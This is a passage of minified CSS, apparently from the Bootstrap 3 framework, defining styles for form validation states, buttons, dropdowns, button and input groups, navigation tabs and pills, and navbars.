#ce8483}.has-error .input-group-addon{color:#a94442;background-color:#f2dede;border-color:#a94442}.has-error .form-control-feedback{color:#a94442}.has-feedback label~.form-control-feedback{top:25px}.has-feedback label.sr-only~.form-control-feedback{top:0}.help-block{display:block;margin-top:5px;margin-bottom:10px;color:#737373}@media (min-width:768px){.form-inline .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.form-inline .form-control{display:inline-block;width:auto;vertical-align:middle}.form-inline .form-control-static{display:inline-block}.form-inline .input-group{display:inline-table;vertical-align:middle}.form-inline .input-group .form-control,.form-inline .input-group .input-group-addon,.form-inline .input-group .input-group-btn{width:auto}.form-inline .input-group>.form-control{width:100%}.form-inline .control-label{margin-bottom:0;vertical-align:middle}.form-inline .checkbox,.form-inline .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}.form-inline .checkbox label,.form-inline .radio label{padding-left:0}.form-inline .checkbox input[type=checkbox],.form-inline .radio input[type=radio]{position:relative;margin-left:0}.form-inline .has-feedback .form-control-feedback{top:0}}.form-horizontal .checkbox,.form-horizontal .checkbox-inline,.form-horizontal .radio,.form-horizontal .radio-inline{padding-top:7px;margin-top:0;margin-bottom:0}.form-horizontal .checkbox,.form-horizontal .radio{min-height:27px}.form-horizontal .form-group{margin-right:-15px;margin-left:-15px}@media (min-width:768px){.form-horizontal .control-label{padding-top:7px;margin-bottom:0;text-align:right}}.form-horizontal .has-feedback .form-control-feedback{right:15px}@media (min-width:768px){.form-horizontal .form-group-lg .control-label{padding-top:11px;font-size:18px}}@media (min-width:768px){.form-horizontal .form-group-sm .control-label{padding-top:6px;font-size:12px}}.btn{display:inline-block;margin-bottom:0;font-weight:400;text-align:center;white-space:nowrap;vertical-align:middle;-ms-touch-action:manipulation;touch-action:manipulation;cursor:pointer;background-image:none;border:1px solid transparent;padding:6px 12px;font-size:14px;line-height:1.42857143;border-radius:4px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.btn.active.focus,.btn.active:focus,.btn.focus,.btn:active.focus,.btn:active:focus,.btn:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}.btn.focus,.btn:focus,.btn:hover{color:#333;text-decoration:none}.btn.active,.btn:active{background-image:none;outline:0;-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn.disabled,.btn[disabled],fieldset[disabled] .btn{cursor:not-allowed;filter:alpha(opacity=65);opacity:.65;-webkit-box-shadow:none;box-shadow:none}a.btn.disabled,fieldset[disabled] a.btn{pointer-events:none}.btn-default{color:#333;background-color:#fff;border-color:#ccc}.btn-default.focus,.btn-default:focus{color:#333;background-color:#e6e6e6;border-color:#8c8c8c}.btn-default:hover{color:#333;background-color:#e6e6e6;border-color:#adadad}.btn-default.active,.btn-default:active,.open>.dropdown-toggle.btn-default{color:#333;background-color:#e6e6e6;background-image:none;border-color:#adadad}.btn-default.active.focus,.btn-default.active:focus,.btn-default.active:hover,.btn-default:active.focus,.btn-default:active:focus,.btn-default:active:hover,.open>.dropdown-toggle.btn-default.focus,.open>.dropdown-toggle.btn-default:focus,.open>.dropdown-toggle.btn-default:hover{color:#333;background-color:#d4d4d4;border-color:#8c8c8c}.btn-default.disabled.focus,.btn-default.disabled:focus,.btn-default.disabled:hover,.btn-default[disabled].focus,.btn-default[disabled]:focus,.btn-default[disabled]:hover,fieldset[disabled] .btn-default.focus,fieldset[disabled] .btn-default:focus,fieldset[disabled] .btn-default:hover{background-color:#fff;border-color:#ccc}.btn-default .badge{color:#fff;background-color:#333}.btn-primary{color:#fff;background-color:#337ab7;border-color:#2e6da4}.btn-primary.focus,.btn-primary:focus{color:#fff;background-color:#286090;border-color:#122b40}.btn-primary:hover{color:#fff;background-color:#286090;border-color:#204d74}.btn-primary.active,.btn-primary:active,.open>.dropdown-toggle.btn-primary{color:#fff;background-color:#286090;background-image:none;border-color:#204d74}.btn-primary.active.focus,.btn-primary.active:focus,.btn-primary.active:hover,.btn-primary:active.focus,.btn-primary:active:focus,.btn-primary:active:hover,.open>.dropdown-toggle.btn-primary.focus,.open>.dropdown-toggle.btn-primary:focus,.open>.dropdown-toggle.btn-primary:hover{color:#fff;background-color:#204d74;border-color:#122b40}.btn-primary.disabled.focus,.btn-primary.disabled:focus,.btn-primary.disabled:hover,.btn-primary[disabled].focus,.btn-primary[disabled]:focus,.btn-primary[disabled]:hover,fieldset[disabled] .btn-primary.focus,fieldset[disabled] .btn-primary:focus,fieldset[disabled] .btn-primary:hover{background-color:#337ab7;border-color:#2e6da4}.btn-primary .badge{color:#337ab7;background-color:#fff}.btn-success{color:#fff;background-color:#5cb85c;border-color:#4cae4c}.btn-success.focus,.btn-success:focus{color:#fff;background-color:#449d44;border-color:#255625}.btn-success:hover{color:#fff;background-color:#449d44;border-color:#398439}.btn-success.active,.btn-success:active,.open>.dropdown-toggle.btn-success{color:#fff;background-color:#449d44;background-image:none;border-color:#398439}.btn-success.active.focus,.btn-success.active:focus,.btn-success.active:hover,.btn-success:active.focus,.btn-success:active:focus,.btn-success:active:hover,.open>.dropdown-toggle.btn-success.focus,.open>.dropdown-toggle.btn-success:focus,.open>.dropdown-toggle.btn-success:hover{color:#fff;background-color:#398439;border-color:#255625}.btn-success.disabled.focus,.btn-success.disabled:focus,.btn-success.disabled:hover,.btn-success[disabled].focus,.btn-success[disabled]:focus,.btn-success[disabled]:hover,fieldset[disabled] .btn-success.focus,fieldset[disabled] .btn-success:focus,fieldset[disabled] .btn-success:hover{background-color:#5cb85c;border-color:#4cae4c}.btn-success .badge{color:#5cb85c;background-color:#fff}.btn-info{color:#fff;background-color:#5bc0de;border-color:#46b8da}.btn-info.focus,.btn-info:focus{color:#fff;background-color:#31b0d5;border-color:#1b6d85}.btn-info:hover{color:#fff;background-color:#31b0d5;border-color:#269abc}.btn-info.active,.btn-info:active,.open>.dropdown-toggle.btn-info{color:#fff;background-color:#31b0d5;background-image:none;border-color:#269abc}.btn-info.active.focus,.btn-info.active:focus,.btn-info.active:hover,.btn-info:active.focus,.btn-info:active:focus,.btn-info:active:hover,.open>.dropdown-toggle.btn-info.focus,.open>.dropdown-toggle.btn-info:focus,.open>.dropdown-toggle.btn-info:hover{color:#fff;background-color:#269abc;border-color:#1b6d85}.btn-info.disabled.focus,.btn-info.disabled:focus,.btn-info.disabled:hover,.btn-info[disabled].focus,.btn-info[disabled]:focus,.btn-info[disabled]:hover,fieldset[disabled] .btn-info.focus,fieldset[disabled] .btn-info:focus,fieldset[disabled] .btn-info:hover{background-color:#5bc0de;border-color:#46b8da}.btn-info .badge{color:#5bc0de;background-color:#fff}.btn-warning{color:#fff;background-color:#f0ad4e;border-color:#eea236}.btn-warning.focus,.btn-warning:focus{color:#fff;background-color:#ec971f;border-color:#985f0d}.btn-warning:hover{color:#fff;background-color:#ec971f;border-color:#d58512}.btn-warning.active,.btn-warning:active,.open>.dropdown-toggle.btn-warning{color:#fff;background-color:#ec971f;background-image:none;border-color:#d58512}.btn-warning.active.focus,.btn-warning.active:focus,.btn-warning.active:hover,.btn-warning:active.focus,.btn-warning:active:focus,.btn-warning:active:hover,.open>.dropdown-toggle.btn-warning.focus,.open>.dropdown-toggle.btn-warning:focus,.open>.dropdown-toggle.btn-warning:hover{color:#fff;background-color:#d58512;border-color:#985f0d}.btn-warning.disabled.focus,.btn-warning.disabled:focus,.btn-warning.disabled:hover,.btn-warning[disabled].focus,.btn-warning[disabled]:focus,.btn-warning[disabled]:hover,fieldset[disabled] .btn-warning.focus,fieldset[disabled] .btn-warning:focus,fieldset[disabled] .btn-warning:hover{background-color:#f0ad4e;border-color:#eea236}.btn-warning .badge{color:#f0ad4e;background-color:#fff}.btn-danger{color:#fff;background-color:#d9534f;border-color:#d43f3a}.btn-danger.focus,.btn-danger:focus{color:#fff;background-color:#c9302c;border-color:#761c19}.btn-danger:hover{color:#fff;background-color:#c9302c;border-color:#ac2925}.btn-danger.active,.btn-danger:active,.open>.dropdown-toggle.btn-danger{color:#fff;background-color:#c9302c;background-image:none;border-color:#ac2925}.btn-danger.active.focus,.btn-danger.active:focus,.btn-danger.active:hover,.btn-danger:active.focus,.btn-danger:active:focus,.btn-danger:active:hover,.open>.dropdown-toggle.btn-danger.focus,.open>.dropdown-toggle.btn-danger:focus,.open>.dropdown-toggle.btn-danger:hover{color:#fff;background-color:#ac2925;border-color:#761c19}.btn-danger.disabled.focus,.btn-danger.disabled:focus,.btn-danger.disabled:hover,.btn-danger[disabled].focus,.btn-danger[disabled]:focus,.btn-danger[disabled]:hover,fieldset[disabled] .btn-danger.focus,fieldset[disabled] .btn-danger:focus,fieldset[disabled] .btn-danger:hover{background-color:#d9534f;border-color:#d43f3a}.btn-danger .badge{color:#d9534f;background-color:#fff}.btn-link{font-weight:400;color:#337ab7;border-radius:0}.btn-link,.btn-link.active,.btn-link:active,.btn-link[disabled],fieldset[disabled] .btn-link{background-color:transparent;-webkit-box-shadow:none;box-shadow:none}.btn-link,.btn-link:active,.btn-link:focus,.btn-link:hover{border-color:transparent}.btn-link:focus,.btn-link:hover{color:#23527c;text-decoration:underline;background-color:transparent}.btn-link[disabled]:focus,.btn-link[disabled]:hover,fieldset[disabled] .btn-link:focus,fieldset[disabled] .btn-link:hover{color:#777;text-decoration:none}.btn-group-lg>.btn,.btn-lg{padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}.btn-group-sm>.btn,.btn-sm{padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}.btn-group-xs>.btn,.btn-xs{padding:1px 5px;font-size:12px;line-height:1.5;border-radius:3px}.btn-block{display:block;width:100%}.btn-block+.btn-block{margin-top:5px}input[type=button].btn-block,input[type=reset].btn-block,input[type=submit].btn-block{width:100%}.fade{opacity:0;-webkit-transition:opacity .15s linear;-o-transition:opacity .15s linear;transition:opacity .15s linear}.fade.in{opacity:1}.collapse{display:none}.collapse.in{display:block}tr.collapse.in{display:table-row}tbody.collapse.in{display:table-row-group}.collapsing{position:relative;height:0;overflow:hidden;-webkit-transition-property:height,visibility;-o-transition-property:height,visibility;transition-property:height,visibility;-webkit-transition-duration:.35s;-o-transition-duration:.35s;transition-duration:.35s;-webkit-transition-timing-function:ease;-o-transition-timing-function:ease;transition-timing-function:ease}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px dashed;border-top:4px solid\9;border-right:4px solid transparent;border-left:4px solid transparent}.dropdown,.dropup{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;font-size:14px;text-align:left;list-style:none;background-color:#fff;background-clip:padding-box;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175)}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:400;line-height:1.42857143;color:#333;white-space:nowrap}.dropdown-menu>li>a:focus,.dropdown-menu>li>a:hover{color:#262626;text-decoration:none;background-color:#f5f5f5}.dropdown-menu>.active>a,.dropdown-menu>.active>a:focus,.dropdown-menu>.active>a:hover{color:#fff;text-decoration:none;background-color:#337ab7;outline:0}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{color:#777}.dropdown-menu>.disabled>a:focus,.dropdown-menu>.disabled>a:hover{text-decoration:none;cursor:not-allowed;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false)}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-menu-right{right:0;left:auto}.dropdown-menu-left{right:auto;left:0}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.42857143;color:#777;white-space:nowrap}.dropdown-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{content:"";border-top:0;border-bottom:4px dashed;border-bottom:4px solid\9}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:2px}@media (min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}.navbar-right .dropdown-menu-left{right:auto;left:0}}.btn-group,.btn-group-vertical{position:relative;display:inline-block;vertical-align:middle}.btn-group-vertical>.btn,.btn-group>.btn{position:relative;float:left}.btn-group-vertical>.btn.active,.btn-group-vertical>.btn:active,.btn-group-vertical>.btn:focus,.btn-group-vertical>.btn:hover,.btn-group>.btn.active,.btn-group>.btn:active,.btn-group>.btn:focus,.btn-group>.btn:hover{z-index:2}.btn-group .btn+.btn,.btn-group .btn+.btn-group,.btn-group .btn-group+.btn,.btn-group .btn-group+.btn-group{margin-left:-1px}.btn-toolbar{margin-left:-5px}.btn-toolbar .btn,.btn-toolbar .btn-group,.btn-toolbar .input-group{float:left}.btn-toolbar>.btn,.btn-toolbar>.btn-group,.btn-toolbar>.input-group{margin-left:5px}.btn-group>.btn:not(:first-child):not(:last-child):not(.dropdown-toggle){border-radius:0}.btn-group>.btn:first-child{margin-left:0}.btn-group>.btn:first-child:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn:last-child:not(:first-child),.btn-group>.dropdown-toggle:not(:first-child){border-top-left-radius:0;border-bottom-left-radius:0}.btn-group>.btn-group{float:left}.btn-group>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-top-right-radius:0;border-bottom-right-radius:0}.btn-group>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-bottom-left-radius:0}.btn-group .dropdown-toggle:active,.btn-group.open .dropdown-toggle{outline:0}.btn-group>.btn+.dropdown-toggle{padding-right:8px;padding-left:8px}.btn-group>.btn-lg+.dropdown-toggle{padding-right:12px;padding-left:12px}.btn-group.open .dropdown-toggle{-webkit-box-shadow:inset 0 3px 5px rgba(0,0,0,.125);box-shadow:inset 0 3px 5px rgba(0,0,0,.125)}.btn-group.open .dropdown-toggle.btn-link{-webkit-box-shadow:none;box-shadow:none}.btn .caret{margin-left:0}.btn-lg .caret{border-width:5px 5px 0;border-bottom-width:0}.dropup .btn-lg .caret{border-width:0 5px 5px}.btn-group-vertical>.btn,.btn-group-vertical>.btn-group,.btn-group-vertical>.btn-group>.btn{display:block;float:none;width:100%;max-width:100%}.btn-group-vertical>.btn-group>.btn{float:none}.btn-group-vertical>.btn+.btn,.btn-group-vertical>.btn+.btn-group,.btn-group-vertical>.btn-group+.btn,.btn-group-vertical>.btn-group+.btn-group{margin-top:-1px;margin-left:0}.btn-group-vertical>.btn:not(:first-child):not(:last-child){border-radius:0}.btn-group-vertical>.btn:first-child:not(:last-child){border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn:last-child:not(:first-child){border-top-left-radius:0;border-top-right-radius:0;border-bottom-right-radius:4px;border-bottom-left-radius:4px}.btn-group-vertical>.btn-group:not(:first-child):not(:last-child)>.btn{border-radius:0}.btn-group-vertical>.btn-group:first-child:not(:last-child)>.btn:last-child,.btn-group-vertical>.btn-group:first-child:not(:last-child)>.dropdown-toggle{border-bottom-right-radius:0;border-bottom-left-radius:0}.btn-group-vertical>.btn-group:last-child:not(:first-child)>.btn:first-child{border-top-left-radius:0;border-top-right-radius:0}.btn-group-justified{display:table;width:100%;table-layout:fixed;border-collapse:separate}.btn-group-justified>.btn,.btn-group-justified>.btn-group{display:table-cell;float:none;width:1%}.btn-group-justified>.btn-group .btn{width:100%}.btn-group-justified>.btn-group .dropdown-menu{left:auto}[data-toggle=buttons]>.btn input[type=checkbox],[data-toggle=buttons]>.btn input[type=radio],[data-toggle=buttons]>.btn-group>.btn input[type=checkbox],[data-toggle=buttons]>.btn-group>.btn input[type=radio]{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.input-group{position:relative;display:table;border-collapse:separate}.input-group[class*=col-]{float:none;padding-right:0;padding-left:0}.input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}.input-group .form-control:focus{z-index:3}.input-group-lg>.form-control,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.btn{height:46px;padding:10px 16px;font-size:18px;line-height:1.3333333;border-radius:6px}select.input-group-lg>.form-control,select.input-group-lg>.input-group-addon,select.input-group-lg>.input-group-btn>.btn{height:46px;line-height:46px}select[multiple].input-group-lg>.form-control,select[multiple].input-group-lg>.input-group-addon,select[multiple].input-group-lg>.input-group-btn>.btn,textarea.input-group-lg>.form-control,textarea.input-group-lg>.input-group-addon,textarea.input-group-lg>.input-group-btn>.btn{height:auto}.input-group-sm>.form-control,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.btn{height:30px;padding:5px 10px;font-size:12px;line-height:1.5;border-radius:3px}select.input-group-sm>.form-control,select.input-group-sm>.input-group-addon,select.input-group-sm>.input-group-btn>.btn{height:30px;line-height:30px}select[multiple].input-group-sm>.form-control,select[multiple].input-group-sm>.input-group-addon,select[multiple].input-group-sm>.input-group-btn>.btn,textarea.input-group-sm>.form-control,textarea.input-group-sm>.input-group-addon,textarea.input-group-sm>.input-group-btn>.btn{height:auto}.input-group .form-control,.input-group-addon,.input-group-btn{display:table-cell}.input-group .form-control:not(:first-child):not(:last-child),.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:400;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=checkbox],.input-group-addon input[type=radio]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn-group:not(:last-child)>.btn,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle){border-top-right-radius:0;border-bottom-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:first-child>.btn-group:not(:first-child)>.btn,.input-group-btn:first-child>.btn:not(:first-child),.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group>.btn,.input-group-btn:last-child>.dropdown-toggle{border-top-left-radius:0;border-bottom-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;font-size:0;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:active,.input-group-btn>.btn:focus,.input-group-btn>.btn:hover{z-index:2}.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group{margin-right:-1px}.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group{z-index:2;margin-left:-1px}.nav{padding-left:0;margin-bottom:0;list-style:none}.nav>li{position:relative;display:block}.nav>li>a{position:relative;display:block;padding:10px 15px}.nav>li>a:focus,.nav>li>a:hover{text-decoration:none;background-color:#eee}.nav>li.disabled>a{color:#777}.nav>li.disabled>a:focus,.nav>li.disabled>a:hover{color:#777;text-decoration:none;cursor:not-allowed;background-color:transparent}.nav .open>a,.nav .open>a:focus,.nav .open>a:hover{background-color:#eee;border-color:#337ab7}.nav .nav-divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.nav>li>a>img{max-width:none}.nav-tabs{border-bottom:1px solid #ddd}.nav-tabs>li{float:left;margin-bottom:-1px}.nav-tabs>li>a{margin-right:2px;line-height:1.42857143;border:1px solid transparent;border-radius:4px 4px 0 0}.nav-tabs>li>a:hover{border-color:#eee #eee #ddd}.nav-tabs>li.active>a,.nav-tabs>li.active>a:focus,.nav-tabs>li.active>a:hover{color:#555;cursor:default;background-color:#fff;border:1px solid #ddd;border-bottom-color:transparent}.nav-tabs.nav-justified{width:100%;border-bottom:0}.nav-tabs.nav-justified>li{float:none}.nav-tabs.nav-justified>li>a{margin-bottom:5px;text-align:center}.nav-tabs.nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}@media (min-width:768px){.nav-tabs.nav-justified>li{display:table-cell;width:1%}.nav-tabs.nav-justified>li>a{margin-bottom:0}}.nav-tabs.nav-justified>li>a{margin-right:0;border-radius:4px}.nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border:1px solid #ddd}@media (min-width:768px){.nav-tabs.nav-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}.nav-tabs.nav-justified>.active>a,.nav-tabs.nav-justified>.active>a:focus,.nav-tabs.nav-justified>.active>a:hover{border-bottom-color:#fff}}.nav-pills>li{float:left}.nav-pills>li>a{border-radius:4px}.nav-pills>li+li{margin-left:2px}.nav-pills>li.active>a,.nav-pills>li.active>a:focus,.nav-pills>li.active>a:hover{color:#fff;background-color:#337ab7}.nav-stacked>li{float:none}.nav-stacked>li+li{margin-top:2px;margin-left:0}.nav-justified{width:100%}.nav-justified>li{float:none}.nav-justified>li>a{margin-bottom:5px;text-align:center}.nav-justified>.dropdown .dropdown-menu{top:auto;left:auto}@media (min-width:768px){.nav-justified>li{display:table-cell;width:1%}.nav-justified>li>a{margin-bottom:0}}.nav-tabs-justified{border-bottom:0}.nav-tabs-justified>li>a{margin-right:0;border-radius:4px}.nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border:1px solid #ddd}@media (min-width:768px){.nav-tabs-justified>li>a{border-bottom:1px solid #ddd;border-radius:4px 4px 0 0}.nav-tabs-justified>.active>a,.nav-tabs-justified>.active>a:focus,.nav-tabs-justified>.active>a:hover{border-bottom-color:#fff}}.tab-content>.tab-pane{display:none}.tab-content>.active{display:block}.nav-tabs .dropdown-menu{margin-top:-1px;border-top-left-radius:0;border-top-right-radius:0}.navbar{position:relative;min-height:50px;margin-bottom:20px;border:1px solid transparent}@media (min-width:768px){.navbar{border-radius:4px}}@media (min-width:768px){.navbar-header{float:left}}.navbar-collapse{padding-right:15px;padding-left:15px;overflow-x:visible;border-top:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 0 rgba(255,255,255,.1);-webkit-overflow-scrolling:touch}.navbar-collapse.in{overflow-y:auto}@media (min-width:768px){.navbar-collapse{width:auto;border-top:0;-webkit-box-shadow:none;box-shadow:none}.navbar-collapse.collapse{display:block!important;height:auto!important;padding-bottom:0;overflow:visible!important}.navbar-collapse.in{overflow-y:visible}.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse,.navbar-static-top .navbar-collapse{padding-right:0;padding-left:0}}.navbar-fixed-bottom,.navbar-fixed-top{position:fixed;right:0;left:0;z-index:1030}.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse{max-height:340px}@media (max-device-width:480px) and (orientation:landscape){.navbar-fixed-bottom .navbar-collapse,.navbar-fixed-top .navbar-collapse{max-height:200px}}@media (min-width:768px){.navbar-fixed-bottom,.navbar-fixed-top{border-radius:0}}.navbar-fixed-top{top:0;border-width:0 0 1px}.navbar-fixed-bottom{bottom:0;margin-bottom:0;border-width:1px 0 0}.container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:-15px;margin-left:-15px}@media (min-width:768px){.container-fluid>.navbar-collapse,.container-fluid>.navbar-header,.container>.navbar-collapse,.container>.navbar-header{margin-right:0;margin-left:0}}.navbar-static-top{z-index:1000;border-width:0 0 1px}@media (min-width:768px){.navbar-static-top{border-radius:0}}.navbar-brand{float:left;height:50px;padding:15px 15px;font-size:18px;line-height:20px}.navbar-brand:focus,.navbar-brand:hover{text-decoration:none}.navbar-brand>img{display:block}@media (min-width:768px){.navbar>.container .navbar-brand,.navbar>.container-fluid .navbar-brand{margin-left:-15px}}.navbar-toggle{position:relative;float:right;padding:9px 10px;margin-right:15px;margin-top:8px;margin-bottom:8px;background-color:transparent;background-image:none;border:1px solid transparent;border-radius:4px}.navbar-toggle:focus{outline:0}.navbar-toggle .icon-bar{display:block;width:22px;height:2px;border-radius:1px}.navbar-toggle .icon-bar+.icon-bar{margin-top:4px}@media (min-width:768px){.navbar-toggle{display:none}}.navbar-nav{margin:7.5px -15px}.navbar-nav>li>a{padding-top:10px;padding-bottom:10px;line-height:20px}@media (max-width:767px){.navbar-nav .open .dropdown-menu{position:static;float:none;width:auto;margin-top:0;background-color:transparent;border:0;-webkit-box-shadow:none;box-shadow:none}.navbar-nav .open .dropdown-menu .dropdown-header,.navbar-nav .open .dropdown-menu>li>a{padding:5px 15px 5px 25px}.navbar-nav .open .dropdown-menu>li>a{line-height:20px}.navbar-nav .open .dropdown-menu>li>a:focus,.navbar-nav .open .dropdown-menu>li>a:hover{background-image:none}}@media (min-width:768px){.navbar-nav{float:left;margin:0}.navbar-nav>li{float:left}.navbar-nav>li>a{padding-top:15px;padding-bottom:15px}}.navbar-form{padding:10px 15px;margin-right:-15px;margin-left:-15px;border-top:1px solid transparent;border-bottom:1px solid transparent;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1);box-shadow:inset 0 1px 0 rgba(255,255,255,.1),0 1px 0 rgba(255,255,255,.1);margin-top:8px;margin-bottom:8px}@media (min-width:768px){.navbar-form .form-group{display:inline-block;margin-bottom:0;vertical-align:middle}.navbar-form .form-control{display:inline-block;width:auto;vertical-align:middle}.navbar-form .form-control-static{display:inline-block}.navbar-form .input-group{display:inline-table;vertical-align:middle}.navbar-form .input-group .form-control,.navbar-form .input-group .input-group-addon,.navbar-form .input-group .input-group-btn{width:auto}.navbar-form .input-group>.form-control{width:100%}.navbar-form .control-label{margin-bottom:0;vertical-align:middle}.navbar-form .checkbox,.navbar-form .radio{display:inline-block;margin-top:0;margin-bottom:0;vertical-align:middle}.navbar-form .checkbox label,.navbar-form .radio label{padding-left:0}.navbar-form .checkbox input[type=checkbox],.navbar-form .radio input[type=radio]{position:relative;margin-left:0}.navbar-form .has-feedback .form-control-feedback{top:0}}@media (max-width:767px){.navbar-form .form-group{margin-bottom:5px}.navbar-form .form-group:last-child{margin-bottom:0}}@media (min-width:768px){.navbar-form{width:auto;padding-top:0;padding-bottom:0;margin-right:0;margin-left:0;border:0;-webkit-box-shadow:none;box-shadow:none}}.navbar-nav>li>.dropdown-menu{margin-top:0;border-top-left-radius:0;border-top-right-radius:0}.navbar-fixed-bottom .navbar-nav>li>.dropdown-menu{margin-bottom:0;border-top-left-radius:4px;border-top-right-radius:4px;border-bottom-right-radius:0;border-bottom-left-radius:0}.navbar-btn{margin-top:8px;margin-bottom:8px}.navbar-btn.btn-sm{margin-top:10px;margin-bottom:10px}.navbar-btn.btn-xs{margin-top:14px;margin-bottom:14px}.navbar-text{margin-top:15px;margin-bottom:15px}@media (min-width:768px){.navbar-text{float:left;margin-right:15px;margin-left:15px}}@media (min-width:768px){.navbar-left{float:left!important}.navbar-right{float:right!important;margin-right:-15px}.navbar-right~.navbar-right{margin-right:0}}.navbar-default{background-color:#f8f8f8;border-color:#e7e7e7}.navbar-default .navbar-brand{color:#777}.navbar-default .navbar-brand:focus,.navbar-default .navbar-brand:hover{color:#5e5e5e;background-color:transparent}.navbar-default .navbar-text{color:#777}.navbar-default .navbar-nav>li>a{color:#777}.navbar-default .navbar-nav>li>a:focus,.navbar-default .navbar-nav>li>a:hover{color:#333;background-color:transparent}.navbar-default .navbar-nav>.active>a,.navbar-default .navbar-nav>.active>a:focus,.navbar-default .navbar-nav>.active>a:hover{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav>.disabled>a,.navbar-default .navbar-nav>.disabled>a:focus,.navbar-default .navbar-nav>.disabled>a:hover{color:#ccc;background-color:transparent}.navbar-default .navbar-nav>.open>a,.navbar-default .navbar-nav>.open>a:focus,.navbar-default .navbar-nav>.open>a:hover{color:#555;background-color:#e7e7e7}@media (max-width:767px){.navbar-default .navbar-nav .open .dropdown-menu>li>a{color:#777}.navbar-default .navbar-nav .open .dropdown-menu>li>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>li>a:hover{color:#333;background-color:transparent}.navbar-default .navbar-nav .open .dropdown-menu>.active>a,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.active>a:hover{color:#555;background-color:#e7e7e7}.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:focus,.navbar-default .navbar-nav .open .dropdown-menu>.disabled>a:hover{color:#ccc;background-color:transparent}}.navbar-default .navbar-toggle{border-color:#ddd}.navbar-default .navbar-toggle:focus,.navbar-default .navbar-toggle:hover{background-color:#ddd}.navbar-default .navbar-toggle .icon-bar{background-color:#888}.navbar-default .navbar-collapse,.navbar-default .navbar-form{border-color:#e7e7e7}.navbar-default .navbar-link{color:#777}.navbar-default .navbar-link:hover{color:#333}.navbar-default .btn-link{color:#777}.navbar-default .btn-link:focus,.navbar-default .btn-link:hover{color:#333}.navbar-default 